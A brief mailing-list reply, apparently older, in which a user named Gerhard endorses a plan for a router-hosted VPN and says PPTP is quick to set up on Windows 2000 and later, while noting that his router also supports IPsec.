> I like your approach and am going to try it - VPN server-in-router at
> main location, setup PPTP at the other end.

FWIW, my router also supports IPsec. However, I find PPTP has generally
worked well for me and it is very quick and easy to set up on Win2k+
systems without any additional software.

Gerhard
